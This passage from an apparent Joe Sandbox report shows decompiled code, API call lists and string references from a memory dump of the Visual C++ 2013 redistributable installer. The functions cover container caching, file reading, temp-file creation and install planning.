				_t26 = __edx;
				_t23 = __ebx;
				_push(__ecx);
				_t29 = __eax;
				_t25 = CreateFileW(__edi, 0x80000000, 5, 0, 3, 0x8000000, 0);
				_v8 = _t25;
				if(_t25 != 0xffffffff) {
					_t9 =  *((intOrPtr*)(_t29 + 0x38));
					if( *((intOrPtr*)(_t29 + 0x38)) == 0) {
						L9:
						_t10 = L"Moving";
						if(_a4 == 0) {
							_t10 = L"Copying";
						}
						_push(_t27);
						E012AF6A2(2, "%ls container from working path \'%ls\' to path \'%ls\'", _t10);
						_push(0x7d0);
						_push(3);
						_push(1);
						if(_a4 == 0) {
							_push(_t27);
							_t30 = E012B5A1F();
							if(_t30 < 0) {
								_push(_t27);
								_push("Failed to copy %ls to %ls");
								goto L16;
							}
						} else {
							_push(1);
							_push(_t27);
							_t30 = E012B5B65();
							if(_t30 < 0) {
								_push(_t27);
								_push("Failed to move %ls to %ls");
								L16:
								_push(_t30);
								E012AFA86();
							}
						}
					} else {
						_t30 = E01297D07(__ebx, _t25, _t26, __edi, _t29, _t9,  *((intOrPtr*)(_t29 + 0x3c)), __edi);
						if(_t30 >= 0) {
							goto L9;
						} else {
							E012AFA86(_t30, "Failed to verify container hash: %ls", __ebx);
						}
					}
					CloseHandle(_v8);
				} else {
					_t19 = GetLastError();
					if(_t19 > 0) {
						_t19 = _t19 & 0x0000ffff | 0x80070000;
					}
					_t30 = _t19;
					if(_t30 >= 0) {
						_t30 = 0x80004005;
					}
					E012B294E(_t19, "cache.cpp", 0x4ae, _t30);
					E012AFA86(_t30, "Failed to open container in working path: %ls", _t27);
				}
				return _t30;
			}

0x01298ed9
0x01298ed9
0x01298ed9
0x01298edc
0x01298ef1
0x01298ef9
0x01298efb
0x01298f01
0x01298f46
0x01298f4b
0x01298f6e
0x01298f72
0x01298f77
0x01298f79
0x01298f79
0x01298f7f
0x01298f88
0x01298f94
0x01298f99
0x01298f9b
0x01298f9d
0x01298fb8
0x01298fbe
0x01298fc2
0x01298fc5
0x01298fc6
0x00000000
0x01298fc6
0x01298f9f
0x01298f9f
0x01298fa2
0x01298fa8
0x01298fac
0x01298faf
0x01298fb0
0x01298fcb
0x01298fcb
0x01298fcc
0x01298fd1
0x01298fac
0x01298f4d
0x01298f57
0x01298f5b
0x00000000
0x01298f5d
0x01298f64
0x01298f69
0x01298f5b
0x01298fd7
0x01298f03
0x01298f03
0x01298f0b
0x01298f12
0x01298f12
0x01298f17
0x01298f1b
0x01298f1d
0x01298f1d
0x01298f2d
0x01298f39
0x01298f3e
0x01298fe1

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,00000000,?,?,0129949F,?,?,?,?,00000000), ref: 01298EF3
GetLastError.KERNEL32(?,?,0129949F,?,?,?,?,00000000,00000000,00000000,?,?,0128F1E8,?,?,?), ref: 01298F03

Part of subcall function 012B5A1F: Sleep.KERNEL32(00000000,?,?,01297736,00000000,?,00000001,00000003,000007D0,?,?,01299676,00000000,00000000,00000000,00000000), ref: 012B5A36

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000003,000007D0,?,?,?), ref: 01298FD7

Strings

Copying, xrefs: 01298F79, 01298F80
cache.cpp, xrefs: 01298F28
%ls container from working path '%ls' to path '%ls', xrefs: 01298F81
Failed to open container in working path: %ls, xrefs: 01298F33
Failed to verify container hash: %ls, xrefs: 01298F5E
Moving, xrefs: 01298F72
Failed to copy %ls to %ls, xrefs: 01298FC6
Failed to move %ls to %ls, xrefs: 01298FB0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: 4b97d2646ef5c241c744eb8538ff720204a691751ae5f93bcf8c55f26bdd1d2e
Instruction ID: c7ae3b92a315585957afffa42a7cf3c9ca32b898118856413bd11797e7472f58
Opcode Fuzzy Hash: 4b97d2646ef5c241c744eb8538ff720204a691751ae5f93bcf8c55f26bdd1d2e
Instruction Fuzzy Hash: 80210B71AB061A77EB32111D8D4AFBB355DDF12F54F58021CBB04BA280E699DD0046E5

Uniqueness

Uniqueness Score: -1.00%

Function 012B5EAA Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 252
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E012B5EAA(signed int _a4, signed int* _a8, void* _a12, signed int _a16, long _a20, signed int _a24, signed int _a28) {
				long _v8;
				signed int _v12;
				char _v16;
				WCHAR* _t43;
				void* _t44;
				signed int _t45;
				signed int _t47;
				signed int _t57;
				signed int _t58;
				long _t66;
				signed int _t67;
				signed int _t69;
				long _t71;
				void* _t72;
				intOrPtr _t74;
				void* _t75;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int* _t85;
				signed int _t86;
				signed int _t91;
				signed int _t93;

				asm("stosd");
				_t71 = 0;
				asm("stosd");
				if(_a8 != 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						_t43 = _a12;
						__eflags = _t43;
						if(_t43 != 0) {
							__eflags = 0 -  *_t43;
							if(0 !=  *_t43) {
								_t44 = CreateFileW(_t43, 0x80000000, 5, 0, 3, 0x8000080, 0);
								_a12 = _t44;
								__eflags = _t44 - 0xffffffff;
								if(_t44 != 0xffffffff) {
									_t83 = 0xffff;
									_t91 = 0x80070000;
									L22:
									_t45 =  &_v16;
									__imp__GetFileSizeEx(_a12, _t45);
									__eflags = _t45;
									if(_t45 != 0) {
										__eflags = _a16 - _t71;
										if(_a16 == _t71) {
											L41:
											__eflags = _a28;
											if(_a28 == 0) {
												_t74 = _v16;
												_t46 = _v12;
												_t93 = _t74 - _t71;
												_t75 = _t74 - _t71;
												asm("sbb eax, edx");
												_t80 = _a24;
												__eflags = 0 - _v12;
												if(__eflags > 0) {
													L43:
													_t85 = _a4;
													_t47 =  *_t85;
													__eflags = _t47;
													if(_t47 == 0) {
														__eflags = _t93;
														if(_t93 == 0) {
															L46:
															 *_a8 =  *_a8 & 0x00000000;
															_t86 = 0;
															L71:
															__eflags = _a12 - 0xffffffff;
															if(_a12 != 0xffffffff) {
																CloseHandle(_a12);
															}
															L73:
															goto L74;
														}
														_t46 = E012B233B(_t93, 1);
														_a24 = _t46;
														__eflags = _t46;
														if(_t46 != 0) {
															L54:
															_t72 = 0;
															_t21 =  &_v8;
															 *_t21 = _v8 & 0;
															__eflags =  *_t21;
															while(1) {
																_a16 = _a16 & 0x00000000;
																_t86 = E012B2591(_t93, _t72,  &_a16);
																__eflags = _t86;
																if(_t86 < 0) {
																	break;
																}
																_t57 = ReadFile(_a12, _a24 + _t72, _a16,  &_v8, 0);
																__eflags = _t57;
																if(_t57 == 0) {
																	_t58 = GetLastError();
																	__eflags = _t58;
																	if(_t58 > 0) {
																		_t58 = _t58 & 0x0000ffff | 0x80070000;
																		__eflags = _t58;
																	}
																	_t86 = _t58;
																	__eflags = _t86;
																	if(_t86 >= 0) {
																		_t86 = 0x80004005;
																	}
																	E012B294E(_t58, "fileutil.cpp", 0x2fe, _t86);
																	break;
																}
																_t72 = _t72 + _v8;
																__eflags = _v8;
																if(_v8 != 0) {
																	continue;
																}
																__eflags = _t72 - _t93;
																if(_t72 == _t93) {
																	_t35 =  &_a24;
																	 *_t35 = _a24 & 0x00000000;
																	__eflags =  *_t35;
																	 *_a4 = _a24;
																	 *_a8 = _t93;
																} else {
																	_t86 = 0x8000ffff;
																}
																break;
															}
															__eflags = _a24;
															if(_a24 != 0) {
																E012B24F6(_a24);
															}
															goto L71;
														}
														_t86 = 0x8007000e;
														_push(0x8007000e);
														_push(0x2f1);
														L29:
														_push("fileutil.cpp");
														E012B294E(_t46);
														goto L71;
													}
													__eflags = _t93;
													if(_t93 != 0) {
														_t46 = E012B235D(_t47, _t93, 1);
														__eflags = _t46;
														if(_t46 != 0) {
															_a24 = _t46;
															goto L54;
														}
														_t86 = 0x8007000e;
														_push(0x8007000e);
														_push(0x2e4);
														goto L29;
													}
													E012B24F6(_t47);
													 *_t85 =  *_t85 & _t93;
													__eflags =  *_t85;
													goto L46;
												}
												if(__eflags < 0) {
													L50:
													_t86 = 0x8007007a;
													_push(0x8007007a);
													_push(0x2d6);
													goto L29;
												}
												__eflags = _t80 - _t75;
												if(_t80 >= _t75) {
													goto L43;
												}
												goto L50;
											}
											_t93 = _a24;
											goto L43;
										}
										_t71 = _a20;
										__eflags = 0 - _v12;
										if(__eflags < 0) {
											L35:
											_t66 = SetFilePointer(_a12, _t71, 0, 1);
											__eflags = _t66 - 0xffffffff;
											if(_t66 != 0xffffffff) {
												goto L41;
											}
											_t46 = GetLastError();
											__eflags = _t46;
											if(_t46 > 0) {
												_t86 = _t83 & _t46 | _t91;
												__eflags = _t86;
											} else {
												_t86 = _t46;
											}
											__eflags = _t86;
											if(_t86 >= 0) {
												goto L41;
											} else {
												_push(_t86);
												_push(0x2c4);
												goto L29;
											}
										}
										if(__eflags > 0) {
											L34:
											_t86 = 0x80070057;
											goto L71;
										}
										__eflags = _t71 - _v16;
										if(_t71 <= _v16) {
											goto L35;
										}
										goto L34;
									}
									_t46 = GetLastError();
									__eflags = _t46 - _t71;
									if(_t46 > _t71) {
										_t86 = _t83 & _t46 | _t91;
										__eflags = _t86;
									} else {
										_t86 = _t46;
									}
									__eflags = _t86 - _t71;
									if(_t86 >= _t71) {
										_t86 = 0x80004005;
									}
									_push(_t86);
									_push(0x2b6);
									goto L29;
								}
								_t67 = GetLastError();
								_t77 = _t67;
								_t83 = 0xffff;
								_t91 = 0x80070000;
								__eflags = _t67;
								if(_t67 > 0) {
									_t77 = _t77 & 0x0000ffff | 0x80070000;
									__eflags = _t77;
								}
								__eflags = _t77 - 0x80070002;
								if(_t77 != 0x80070002) {
									__eflags = _t67 - _t71;
									if(__eflags == 0) {
										goto L22;
									}
									if(__eflags > 0) {
										_t86 = _t83 & _t67 | _t91;
										__eflags = _t86;
									} else {
										_t86 = _t67;
									}
									__eflags = _t86 - _t71;
									if(_t86 >= _t71) {
										_t86 = 0x80004005;
									}
									E012B294E(_t67, "fileutil.cpp", 0x2b1, _t86);
								} else {
									_t86 = 0x80070002;
								}
								goto L73;
							}
							_t69 = 0x80070057;
							_push(0x80070057);
							_push(0x2a7);
							goto L2;
						}
						_t69 = 0x80070057;
						_push(0x80070057);
						_push(0x2a6);
					} else {
						_t69 = 0x80070057;
						_push(0x80070057);
						_push(0x2a5);
					}
					goto L2;
				} else {
					_t69 = 0x80070057;
					_push(0x80070057);
					_push(0x2a4);
					L2:
					_push("fileutil.cpp");
					_t86 = _t69;
					E012B294E(_t69);
					L74:
					return _t86;
				}
			}

0x012b5eb7
0x012b5eb8
0x012b5eba
0x012b5ebe
0x012b5edc
0x012b5edf
0x012b5eee
0x012b5ef1
0x012b5ef3
0x012b5f04
0x012b5f07
0x012b5f28
0x012b5f2e
0x012b5f31
0x012b5f34
0x012b5f8c
0x012b5f91
0x012b5f96
0x012b5f96
0x012b5f9d
0x012b5fa3
0x012b5fa5
0x012b5fd7
0x012b5fda
0x012b6027
0x012b6027
0x012b602b
0x012b6056
0x012b6059
0x012b6060
0x012b6062
0x012b6064
0x012b6066
0x012b606b
0x012b606d
0x012b6030
0x012b6030
0x012b6033
0x012b6035
0x012b6037
0x012b60f3
0x012b60f5
0x012b6049
0x012b604c
0x012b604f
0x012b616a
0x012b616a
0x012b616e
0x012b6173
0x012b6173
0x012b6179
0x00000000
0x012b6179
0x012b60fe
0x012b6103
0x012b6106
0x012b6108
0x012b60a5
0x012b60a5
0x012b60a7
0x012b60a7
0x012b60a7
0x012b60aa
0x012b60aa
0x012b60b9
0x012b60bb
0x012b60bd
0x00000000
0x00000000
0x012b60d5
0x012b60db
0x012b60dd
0x012b611a
0x012b6120
0x012b6122
0x012b6129
0x012b6129
0x012b6129
0x012b612e
0x012b6130
0x012b6132
0x012b6134
0x012b6134
0x012b6144
0x00000000
0x012b6144
0x012b60df
0x012b60e2
0x012b60e6
0x00000000
0x00000000
0x012b60e8
0x012b60ea
0x012b6151
0x012b6151
0x012b6151
0x012b6155
0x012b615a
0x012b60ec
0x012b60ec
0x012b60ec
0x00000000
0x012b60ea
0x012b615c
0x012b6160
0x012b6165
0x012b6165
0x00000000
0x012b6160
0x012b610a
0x012b610f
0x012b6110
0x012b5fc8
0x012b5fc8
0x012b5fcd
0x00000000
0x012b5fcd
0x012b603d
0x012b603f
0x012b6089
0x012b608e
0x012b6090
0x012b60a2
0x00000000
0x012b60a2
0x012b6092
0x012b6097
0x012b6098
0x00000000
0x012b6098
0x012b6042
0x012b6047
0x012b6047
0x00000000
0x012b6047
0x012b606f
0x012b6075
0x012b6075
0x012b607a
0x012b607b
0x00000000
0x012b607b
0x012b6071
0x012b6073
0x00000000
0x00000000
0x00000000
0x012b6073
0x012b602d
0x00000000
0x012b602d
0x012b5fdc
0x012b5fe1
0x012b5fe4
0x012b5ff7
0x012b5ffe
0x012b6004
0x012b6007
0x00000000
0x00000000
0x012b6009
0x012b600f
0x012b6011
0x012b6019
0x012b6019
0x012b6013
0x012b6013
0x012b6013
0x012b601b
0x012b601d
0x00000000
0x012b601f
0x012b601f
0x012b6020
0x00000000
0x012b6020
0x012b601d
0x012b5fe6
0x012b5fed
0x012b5fed
0x00000000
0x012b5fed
0x012b5fe8
0x012b5feb
0x00000000
0x00000000
0x00000000
0x012b5feb
0x012b5fa7
0x012b5fad
0x012b5faf
0x012b5fb7
0x012b5fb7
0x012b5fb1
0x012b5fb1
0x012b5fb1
0x012b5fb9
0x012b5fbb
0x012b5fbd
0x012b5fbd
0x012b5fc2
0x012b5fc3
0x00000000
0x012b5fc3
0x012b5f36
0x012b5f3c
0x012b5f3e
0x012b5f43
0x012b5f48
0x012b5f4a
0x012b5f4e
0x012b5f4e
0x012b5f4e
0x012b5f55
0x012b5f57
0x012b5f60
0x012b5f62
0x00000000
0x00000000
0x012b5f64
0x012b5f6c
0x012b5f6c
0x012b5f66
0x012b5f66
0x012b5f66
0x012b5f6e
0x012b5f70
0x012b5f72
0x012b5f72
0x012b5f82
0x012b5f59
0x012b5f59
0x012b5f59
0x00000000
0x012b5f57
0x012b5f09
0x012b5f0e
0x012b5f0f
0x00000000
0x012b5f0f
0x012b5ef5
0x012b5efa
0x012b5efb
0x012b5ee1
0x012b5ee1
0x012b5ee6
0x012b5ee7
0x012b5ee7
0x00000000
0x012b5ec0
0x012b5ec0
0x012b5ec5
0x012b5ec6
0x012b5ecb
0x012b5ecb
0x012b5ed0
0x012b5ed2
0x012b617a
0x012b617f
0x012b617f

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,00000001,000000F9,00000000,00000000,?,?,?), ref: 012B5F28
GetLastError.KERNEL32 ref: 012B5F36
GetFileSizeEx.KERNEL32(?,?), ref: 012B5F9D
GetLastError.KERNEL32 ref: 012B5FA7
SetFilePointer.KERNEL32(?,?,?,00000001), ref: 012B5FFE
GetLastError.KERNEL32 ref: 012B6009
ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,00000001), ref: 012B60D5
GetLastError.KERNEL32 ref: 012B611A
CloseHandle.KERNEL32(000000FF), ref: 012B6173

Strings

fileutil.cpp, xrefs: 012B5ECB, 012B5F7D, 012B5FC8, 012B613F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 1273122604-2967768451
Opcode ID: 902002be60321b9b4dee2f994f32956c76e7500cb6d2dfdddf6c88efd12a3e02
Instruction ID: 318795e30a9f3ee8e7fa20864ccd24035b92dd36813207c43f5bda48eddd4dc9
Opcode Fuzzy Hash: 902002be60321b9b4dee2f994f32956c76e7500cb6d2dfdddf6c88efd12a3e02
Instruction Fuzzy Hash: 8F810871630207EBEB218E29CCC9BFF76A5AB417E0F254539FB11DB280D6B5C9018B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B2086 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 195
sleepfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E012B2086(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				short _v528;
				struct _SYSTEMTIME _v544;
				char _v548;
				struct _SECURITY_ATTRIBUTES* _v552;
				signed int _v556;
				char _v560;
				char* _v564;
				intOrPtr _v568;
				intOrPtr* _v572;
				intOrPtr* _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t57;
				signed int _t70;
				intOrPtr* _t79;
				signed int _t87;
				void* _t89;
				intOrPtr* _t90;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				intOrPtr _t99;
				void* _t101;
				void* _t104;
				char* _t105;
				void* _t107;
				intOrPtr* _t111;
				signed int _t113;
				void* _t114;
				void* _t115;

				_t107 = __edx;
				_t101 = __ecx;
				_t57 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t57 ^ _t113;
				_v564 = _a12;
				_t99 = _a8;
				_t111 = _a4;
				_v576 = _a16;
				_v568 = _a20;
				_v572 = _a24;
				E012A7E30( &_v528, 0, 0x208);
				_v556 = _v556 | 0xffffffff;
				_v548 = 0;
				_v560 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t115 = _t114 + 0xc;
				_v552 = 0;
				if(_t111 == 0 ||  *_t111 == 0) {
					if(GetTempPathW(0x104,  &_v528) != 0) {
						_push( &_v548);
						_push(_t99);
						_push( &_v528);
						goto L10;
					}
					_t95 = GetLastError();
					if(_t95 > 0) {
						_t95 = _t95 & 0x0000ffff | 0x80070000;
					}
					_t112 = _t95;
					if(_t95 >= 0) {
						_t112 = 0x80004005;
					}
					E012B294E(_t95, "pathutil.cpp", 0x26a, _t112);
					goto L32;
				} else {
					_push( &_v548);
					_push(_t99);
					_push(_t111);
					L10:
					_t70 = E012B201F(_t101, _t107);
					_t112 = _t70;
					if(_t70 < 0) {
						L32:
						if(_v552 != 0) {
							E012B01E8(_v552);
						}
						if(_v560 != 0) {
							E012B01E8(_v560);
						}
						if(_v548 != 0) {
							E012B01E8(_v548);
						}
						return E012A7EAA(_t112, _t99, _v8 ^ _t113, _t107, 0, _t112);
					}
					if(E012B195B(_t99, _v548,  &_v560) != 0) {
						L13:
						if(_v564 == 0) {
							_v564 = 0x12ba5c8;
						}
						while(1) {
							_t99 = 0;
							GetLocalTime( &_v544);
							_t79 = _v576;
							_t104 = 0x2e;
							_t105 = 0x12ba5c8;
							if(_t104 !=  *_t79) {
								_t105 = ".";
							}
							_push(_t79);
							_push(_t105);
							_push(_v564);
							_push(_v544.wSecond & 0x0000ffff);
							_push(_v544.wMinute & 0x0000ffff);
							_push(_v544.wHour & 0x0000ffff);
							_push(_v544.wDay & 0x0000ffff);
							_push(_v544.wMonth & 0x0000ffff);
							_push(_v544.wYear & 0x0000ffff);
							_t87 = E012B177A( &_v552, L"%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls", _v548);
							_t112 = _t87;
							_t115 = _t115 + 0x30;
							if(_t87 < 0) {
								break;
							}
							_t89 = CreateFileW(_v552, 0x40000000, 1, 0, 1, 0x80, 0);
							_v556 = _t89;
							if(_t89 != 0xffffffff) {
								L26:
								if(_v568 == 0) {
									L28:
									_t90 = _v572;
									if(_t90 != 0) {
										_v556 = _v556 | 0xffffffff;
										 *_t90 = _v556;
									}
									break;
								}
								_t91 = E012B1171(_t105, _t107, _v568, _v552, 0);
								_t112 = _t91;
								if(_t91 < 0) {
									break;
								}
								goto L28;
							}
							_t92 = GetLastError();
							if(_t92 == 0x50 || _t92 == 5) {
								Sleep(0x64);
								_t92 = 0;
								_t99 = 1;
							}
							if(_t92 > 0) {
								_t92 = _t92 & 0x0000ffff | 0x80070000;
							}
							_t112 = _t92;
							if(_t92 < 0) {
								goto L32;
							} else {
								if(_t99 != 0) {
									continue;
								}
								goto L26;
							}
						}
						if(_v556 != 0xffffffff) {
							CloseHandle(_v556);
						}
						goto L32;
					}
					_t94 = E012B65D3(_v560, 0);
					_t112 = _t94;
					if(_t94 < 0) {
						goto L32;
					}
					goto L13;
				}
			}

0x012b2086
0x012b2086
0x012b208f
0x012b2096
0x012b209c
0x012b20a6
0x012b20aa
0x012b20ad
0x012b20b7
0x012b20c5
0x012b20d5
0x012b20da
0x012b20e1
0x012b20e7
0x012b20f5
0x012b20f6
0x012b20f7
0x012b20f8
0x012b20fb
0x012b20fe
0x012b2106
0x012b212c
0x012b2168
0x012b2169
0x012b2170
0x00000000
0x012b2170
0x012b212e
0x012b2136
0x012b213d
0x012b213d
0x012b2142
0x012b2146
0x012b2148
0x012b2148
0x012b2158
0x00000000
0x012b210d
0x012b2113
0x012b2114
0x012b2115
0x012b2171
0x012b2171
0x012b2176
0x012b217a
0x012b22ef
0x012b22f5
0x012b22fd
0x012b22fd
0x012b2308
0x012b2310
0x012b2310
0x012b231b
0x012b2323
0x012b2323
0x012b2338
0x012b2338
0x012b2194
0x012b21ac
0x012b21b2
0x012b21b4
0x012b21b4
0x012b21be
0x012b21c5
0x012b21c7
0x012b21cd
0x012b21d5
0x012b21d9
0x012b21de
0x012b21e0
0x012b21e0
0x012b21e5
0x012b21ed
0x012b21ee
0x012b21f4
0x012b21fc
0x012b2204
0x012b220c
0x012b2214
0x012b221c
0x012b222f
0x012b2234
0x012b2236
0x012b223b
0x00000000
0x00000000
0x012b2257
0x012b225d
0x012b2266
0x012b22a1
0x012b22a7
0x012b22c1
0x012b22c1
0x012b22c9
0x012b22d1
0x012b22d8
0x012b22d8
0x00000000
0x012b22c9
0x012b22b6
0x012b22bb
0x012b22bf
0x00000000
0x00000000
0x00000000
0x012b22bf
0x012b2268
0x012b2271
0x012b227a
0x012b2282
0x012b2284
0x012b2284
0x012b2287
0x012b228e
0x012b228e
0x012b2293
0x012b2297
0x00000000
0x012b2299
0x012b229b
0x00000000
0x00000000
0x00000000
0x012b229b
0x012b2297
0x012b22e1
0x012b22e9
0x012b22e9
0x00000000
0x012b22e1
0x012b219d
0x012b21a2
0x012b21a6
0x00000000
0x00000000
0x00000000
0x012b21a6

APIs

_memset.LIBCMT ref: 012B20D5
GetTempPathW.KERNEL32(00000104,?,00000001,00000009,00000000), ref: 012B2124
GetLastError.KERNEL32 ref: 012B212E
GetLocalTime.KERNEL32(?,?,?,?,00000000,?), ref: 012B21C7
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 012B2257
GetLastError.KERNEL32 ref: 012B2268
Sleep.KERNEL32(00000064), ref: 012B227A
CloseHandle.KERNEL32(000000FF), ref: 012B22E9

Strings

pathutil.cpp, xrefs: 012B2153
%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 012B2229

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime_memset
String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 820914711-1101990113
Opcode ID: 05b5efcba6d95354161616010ddf0615ed5c9b8084c591c2a0f2934e9733ee80
Instruction ID: 2c0d679d8c83bd5a5b7c37afa44eae9b6d5e005718380848a4606be1aa76c024
Opcode Fuzzy Hash: 05b5efcba6d95354161616010ddf0615ed5c9b8084c591c2a0f2934e9733ee80
Instruction Fuzzy Hash: 4671827192022AEFDB31AFA8DCCCAEDB6B5AB58790F1006D5E618E6150D7359EC0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012953D2 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012953D2(intOrPtr* __eax, intOrPtr __edx, intOrPtr __edi, signed int* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				short* _v20;
				void* __ebx;
				void* __esi;
				signed int _t88;
				int* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t102;
				signed int _t109;
				intOrPtr* _t113;
				int* _t115;
				intOrPtr* _t117;
				intOrPtr _t121;
				signed int _t123;
				int _t124;
				signed int _t126;
				intOrPtr* _t128;
				signed int _t129;
				int _t130;
				short _t141;
				intOrPtr _t144;
				intOrPtr* _t145;

				_t144 = __edi;
				_t143 = __edx;
				_t130 = 0;
				_t145 = __eax;
				_t123 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 =  *((intOrPtr*)(__edi));
				if( *((intOrPtr*)(__eax + 0x50)) <= 0) {
					L6:
					 *0x12d4f9c =  *0x12d4f9c + 1;
					_t124 =  *0x12d4f9c; // 0x0
					_t88 = E01293958(_t130, _t145, _t150,  &_v12);
					_v8 = _t88;
					if(_t88 < 0) {
						L11:
						_push("Failed to append package start action.");
						L25:
						_push(_t88);
						L33:
						E012AFA86();
						goto L35;
					}
					_t91 = _v12;
					 *_t91 = 1;
					_t91[2] = _t124;
					_t152 =  *_t145 - 3;
					if( *_t145 == 3) {
						L10:
						_t88 = E01293958(_t130, _t145, _t153,  &_v12);
						_v8 = _t88;
						if(_t88 >= 0) {
							_t93 = _v12;
							 *_t93 = 3;
							 *((intOrPtr*)(_t93 + 8)) = _t144;
							_t33 = _t145 + 0x50; // 0xc085012b
							_t126 =  *_t33 - 1;
							__eflags =  *_t145 - 3;
							if(__eflags == 0) {
								L19:
								_v16 = _v16 & 0x00000000;
								__eflags =  *(_t144 + 0x80);
								if(__eflags <= 0) {
									L22:
									_t88 = E01293958(_t130, _t145, __eflags,  &_v12);
									_v8 = _t88;
									__eflags = _t88;
									if(__eflags < 0) {
										L24:
										_push("Failed to append cache action.");
										goto L25;
									}
									_t95 = _v12;
									 *_t95 = 4;
									 *((intOrPtr*)(_t95 + 8)) = _t144;
									_t65 = _t145 + 0x50; // 0xc085012b
									_t66 = _t145 + 0x4c; // 0xa00815ff
									 *((intOrPtr*)(_t126 * 0x28 +  *_t66 + 0x18)) =  *_t65 - 1;
									_t88 = E01293958( *_t66, _t145, __eflags,  &_v12);
									_v8 = _t88;
									__eflags = _t88;
									if(_t88 >= 0) {
										_t128 = _v12;
										 *_t128 = 6;
										_t99 = CreateEventW(0, 1, 0, 0);
										 *(_t128 + 8) = _t99;
										__eflags = _t99;
										if(_t99 != 0) {
											 *_a4 = _t99;
											 *((intOrPtr*)(_t145 + 0x34)) =  *((intOrPtr*)(_t145 + 0x34)) + 1;
											__eflags =  *((intOrPtr*)(_t144 + 0x44)) - 2;
											_t82 =  *((intOrPtr*)(_t144 + 0x44)) != 2;
											__eflags = _t82;
											 *(_t144 + 0x54) = 0 | _t82;
											goto L35;
										}
										_t102 = GetLastError();
										__eflags = _t102;
										if(_t102 > 0) {
											_t102 = _t102 & 0x0000ffff | 0x80070000;
											__eflags = _t102;
										}
										_v8 = _t102;
										__eflags = _t102;
										if(_t102 >= 0) {
											_v8 = 0x80004005;
										}
										E012B294E(_t102, "plan.cpp", 0x840, _v8);
										_push("Failed to create syncpoint event.");
										_push(_v8);
										goto L33;
									}
									goto L24;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									_v20 =  *((intOrPtr*)(_t144 + 0x7c)) + _v16 * 8;
									_t88 = E01294E99( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x7c)) + _v16 * 8)), _t126, _v16, _t143, _t144, _t145, __eflags, _t145, _t144, _t126,  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x7c)) + _v16 * 8 + 4)), 0);
									_v8 = _t88;
									__eflags = _t88;
									if(_t88 < 0) {
										break;
									}
									_t48 = _t145 + 0x4c; // 0xa00815ff
									_t109 = _t126 * 0x28;
